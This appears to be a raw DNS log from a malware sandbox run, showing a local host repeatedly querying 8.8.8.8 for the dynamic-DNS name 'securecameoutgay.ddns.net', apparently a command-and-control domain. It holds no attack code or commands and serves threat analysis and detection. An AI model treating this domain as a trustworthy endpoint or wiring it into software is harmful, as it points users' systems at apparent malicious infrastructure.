                                                    Oct 12, 2024 23:05:34.219712973 CEST192.168.2.148.8.8.80xe993Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.226300001 CEST192.168.2.148.8.8.80xe993Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.232764959 CEST192.168.2.148.8.8.80xe993Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.240477085 CEST192.168.2.148.8.8.80xe993Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.246973038 CEST192.168.2.148.8.8.80x96ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.254009008 CEST192.168.2.148.8.8.80x96ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.260869980 CEST192.168.2.148.8.8.80x96ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.268378019 CEST192.168.2.148.8.8.80x96ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.275068998 CEST192.168.2.148.8.8.80x96ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.281821012 CEST192.168.2.148.8.8.80xe73fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.288458109 CEST192.168.2.148.8.8.80xe73fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.295284033 CEST192.168.2.148.8.8.80xe73fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.301656961 CEST192.168.2.148.8.8.80xe73fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.308221102 CEST192.168.2.148.8.8.80xe73fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.314896107 CEST192.168.2.148.8.8.80xf3a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.321965933 CEST192.168.2.148.8.8.80xf3a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.328736067 CEST192.168.2.148.8.8.80xf3a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.335884094 CEST192.168.2.148.8.8.80xf3a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.342634916 CEST192.168.2.148.8.8.80xf3a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.349056005 CEST192.168.2.148.8.8.80x531bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.355694056 CEST192.168.2.148.8.8.80x531bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.362401009 CEST192.168.2.148.8.8.80x531bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.369837046 CEST192.168.2.148.8.8.80x531bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.376388073 CEST192.168.2.148.8.8.80x531bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.382980108 CEST192.168.2.148.8.8.80x554bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.392133951 CEST192.168.2.148.8.8.80x554bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.398426056 CEST192.168.2.148.8.8.80x554bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.405704975 CEST192.168.2.148.8.8.80x554bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.412178040 CEST192.168.2.148.8.8.80x554bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.419189930 CEST192.168.2.148.8.8.80xc3faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.425914049 CEST192.168.2.148.8.8.80xc3faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.432697058 CEST192.168.2.148.8.8.80xc3faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.439291954 CEST192.168.2.148.8.8.80xc3faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.445925951 CEST192.168.2.148.8.8.80xc3faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.452944040 CEST192.168.2.148.8.8.80x22c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.459371090 CEST192.168.2.148.8.8.80x22c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.465754032 CEST192.168.2.148.8.8.80x22c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.472101927 CEST192.168.2.148.8.8.80x22c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.479396105 CEST192.168.2.148.8.8.80x22c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.486325026 CEST192.168.2.148.8.8.80xd242Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.493453979 CEST192.168.2.148.8.8.80xd242Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.500222921 CEST192.168.2.148.8.8.80xd242Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.506756067 CEST192.168.2.148.8.8.80xd242Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.513407946 CEST192.168.2.148.8.8.80xd242Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.520155907 CEST192.168.2.148.8.8.80x4815Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.526753902 CEST192.168.2.148.8.8.80x4815Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.533261061 CEST192.168.2.148.8.8.80x4815Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.540505886 CEST192.168.2.148.8.8.80x4815Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.547278881 CEST192.168.2.148.8.8.80x4815Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.553839922 CEST192.168.2.148.8.8.80xfa31Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.560839891 CEST192.168.2.148.8.8.80xfa31Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.567526102 CEST192.168.2.148.8.8.80xfa31Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.574506998 CEST192.168.2.148.8.8.80xfa31Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.581319094 CEST192.168.2.148.8.8.80xfa31Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.587878942 CEST192.168.2.148.8.8.80xcd6eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.594552994 CEST192.168.2.148.8.8.80xcd6eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.601325035 CEST192.168.2.148.8.8.80xcd6eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.607657909 CEST192.168.2.148.8.8.80xcd6eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.614526987 CEST192.168.2.148.8.8.80xcd6eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.621135950 CEST192.168.2.148.8.8.80x4cc2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.627413034 CEST192.168.2.148.8.8.80x4cc2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.634167910 CEST192.168.2.148.8.8.80x4cc2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.640744925 CEST192.168.2.148.8.8.80x4cc2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.647253990 CEST192.168.2.148.8.8.80x4cc2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.653795004 CEST192.168.2.148.8.8.80x98f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.660804987 CEST192.168.2.148.8.8.80x98f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.667752028 CEST192.168.2.148.8.8.80x98f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.674868107 CEST192.168.2.148.8.8.80x98f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.682138920 CEST192.168.2.148.8.8.80x98f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.688754082 CEST192.168.2.148.8.8.80x72caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.695964098 CEST192.168.2.148.8.8.80x72caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.702714920 CEST192.168.2.148.8.8.80x72caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.709214926 CEST192.168.2.148.8.8.80x72caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.715797901 CEST192.168.2.148.8.8.80x72caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.722439051 CEST192.168.2.148.8.8.80xc707Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.729952097 CEST192.168.2.148.8.8.80xc707Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.736537933 CEST192.168.2.148.8.8.80xc707Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.743184090 CEST192.168.2.148.8.8.80xc707Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.749977112 CEST192.168.2.148.8.8.80xc707Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.757762909 CEST192.168.2.148.8.8.80x4cc3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.765021086 CEST192.168.2.148.8.8.80x4cc3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.771878004 CEST192.168.2.148.8.8.80x4cc3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.778671980 CEST192.168.2.148.8.8.80x4cc3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.785506964 CEST192.168.2.148.8.8.80x4cc3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.791980028 CEST192.168.2.148.8.8.80xebc3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.798661947 CEST192.168.2.148.8.8.80xebc3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.805699110 CEST192.168.2.148.8.8.80xebc3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.813014984 CEST192.168.2.148.8.8.80xebc3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.819523096 CEST192.168.2.148.8.8.80xebc3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.826045036 CEST192.168.2.148.8.8.80x7f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.832916975 CEST192.168.2.148.8.8.80x7f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.839144945 CEST192.168.2.148.8.8.80x7f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.845514059 CEST192.168.2.148.8.8.80x7f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.851950884 CEST192.168.2.148.8.8.80x7f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.858273983 CEST192.168.2.148.8.8.80xbf79Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.864764929 CEST192.168.2.148.8.8.80xbf79Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.871248960 CEST192.168.2.148.8.8.80xbf79Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.878057003 CEST192.168.2.148.8.8.80xbf79Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.884641886 CEST192.168.2.148.8.8.80xbf79Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.891017914 CEST192.168.2.148.8.8.80xb0eaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.897787094 CEST192.168.2.148.8.8.80xb0eaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.904978037 CEST192.168.2.148.8.8.80xb0eaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.911791086 CEST192.168.2.148.8.8.80xb0eaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.918399096 CEST192.168.2.148.8.8.80xb0eaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.925110102 CEST192.168.2.148.8.8.80x5834Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.932148933 CEST192.168.2.148.8.8.80x5834Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.939519882 CEST192.168.2.148.8.8.80x5834Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.946228027 CEST192.168.2.148.8.8.80x5834Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.953733921 CEST192.168.2.148.8.8.80x5834Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.960457087 CEST192.168.2.148.8.8.80x2d2cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.967021942 CEST192.168.2.148.8.8.80x2d2cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.973800898 CEST192.168.2.148.8.8.80x2d2cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.980566978 CEST192.168.2.148.8.8.80x2d2cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.987510920 CEST192.168.2.148.8.8.80x2d2cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:34.994290113 CEST192.168.2.148.8.8.80x9c93Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.001627922 CEST192.168.2.148.8.8.80x9c93Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.008667946 CEST192.168.2.148.8.8.80x9c93Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.015798092 CEST192.168.2.148.8.8.80x9c93Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.022443056 CEST192.168.2.148.8.8.80x9c93Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.028903008 CEST192.168.2.148.8.8.80xb3acStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.036231041 CEST192.168.2.148.8.8.80xb3acStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.042804003 CEST192.168.2.148.8.8.80xb3acStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.049689054 CEST192.168.2.148.8.8.80xb3acStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.056222916 CEST192.168.2.148.8.8.80xb3acStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.063529015 CEST192.168.2.148.8.8.80xcc68Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.070149899 CEST192.168.2.148.8.8.80xcc68Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.077420950 CEST192.168.2.148.8.8.80xcc68Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.083964109 CEST192.168.2.148.8.8.80xcc68Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.090496063 CEST192.168.2.148.8.8.80xcc68Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.097579002 CEST192.168.2.148.8.8.80x784fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.104846001 CEST192.168.2.148.8.8.80x784fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.111579895 CEST192.168.2.148.8.8.80x784fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.118343115 CEST192.168.2.148.8.8.80x784fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.124972105 CEST192.168.2.148.8.8.80x784fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.131746054 CEST192.168.2.148.8.8.80x2b43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.138406038 CEST192.168.2.148.8.8.80x2b43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.145327091 CEST192.168.2.148.8.8.80x2b43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.151969910 CEST192.168.2.148.8.8.80x2b43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.158422947 CEST192.168.2.148.8.8.80x2b43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.165066957 CEST192.168.2.148.8.8.80x92baStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.171921968 CEST192.168.2.148.8.8.80x92baStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.178525925 CEST192.168.2.148.8.8.80x92baStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.185161114 CEST192.168.2.148.8.8.80x92baStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.191649914 CEST192.168.2.148.8.8.80x92baStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.198297977 CEST192.168.2.148.8.8.80xb0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.204864979 CEST192.168.2.148.8.8.80xb0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.211184978 CEST192.168.2.148.8.8.80xb0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.218091965 CEST192.168.2.148.8.8.80xb0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.224462986 CEST192.168.2.148.8.8.80xb0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.231125116 CEST192.168.2.148.8.8.80x38dbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.237704992 CEST192.168.2.148.8.8.80x38dbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.244321108 CEST192.168.2.148.8.8.80x38dbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.251935005 CEST192.168.2.148.8.8.80x38dbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.259397984 CEST192.168.2.148.8.8.80x38dbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.266340971 CEST192.168.2.148.8.8.80x5341Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.272864103 CEST192.168.2.148.8.8.80x5341Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.279361010 CEST192.168.2.148.8.8.80x5341Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.286700010 CEST192.168.2.148.8.8.80x5341Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.293610096 CEST192.168.2.148.8.8.80x5341Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.300349951 CEST192.168.2.148.8.8.80xb3e1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.306878090 CEST192.168.2.148.8.8.80xb3e1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.314033031 CEST192.168.2.148.8.8.80xb3e1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.320600033 CEST192.168.2.148.8.8.80xb3e1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.327188015 CEST192.168.2.148.8.8.80xb3e1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.334481001 CEST192.168.2.148.8.8.80xe702Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.341248035 CEST192.168.2.148.8.8.80xe702Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.348146915 CEST192.168.2.148.8.8.80xe702Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.354739904 CEST192.168.2.148.8.8.80xe702Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.361426115 CEST192.168.2.148.8.8.80xe702Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.367980003 CEST192.168.2.148.8.8.80x8198Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.374653101 CEST192.168.2.148.8.8.80x8198Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.381365061 CEST192.168.2.148.8.8.80x8198Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.387835026 CEST192.168.2.148.8.8.80x8198Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.394341946 CEST192.168.2.148.8.8.80x8198Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.401287079 CEST192.168.2.148.8.8.80xad3cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.409324884 CEST192.168.2.148.8.8.80xad3cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.415745020 CEST192.168.2.148.8.8.80xad3cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.422413111 CEST192.168.2.148.8.8.80xad3cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.429285049 CEST192.168.2.148.8.8.80xad3cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.435934067 CEST192.168.2.148.8.8.80x2699Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.442353010 CEST192.168.2.148.8.8.80x2699Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.448951006 CEST192.168.2.148.8.8.80x2699Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.455497980 CEST192.168.2.148.8.8.80x2699Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.462007046 CEST192.168.2.148.8.8.80x2699Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.468352079 CEST192.168.2.148.8.8.80xb9aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.474852085 CEST192.168.2.148.8.8.80xb9aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:35.481445074 CEST192.168.2.148.8.8.80xb9aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
